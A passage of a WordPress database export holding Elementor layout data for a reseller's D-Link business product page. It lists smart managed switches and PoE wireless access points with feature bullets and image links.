(ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7339,3377,'_elementor_version','2.5.14'),(7340,3377,'_elementor_edit_mode','builder'),(7350,3379,'_wp_page_template','template-fullwidth.php'),(7343,3378,'_wp_page_template','template-fullwidth.php'),(7344,3378,'_elementor_template_type','post'),(7345,3378,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit 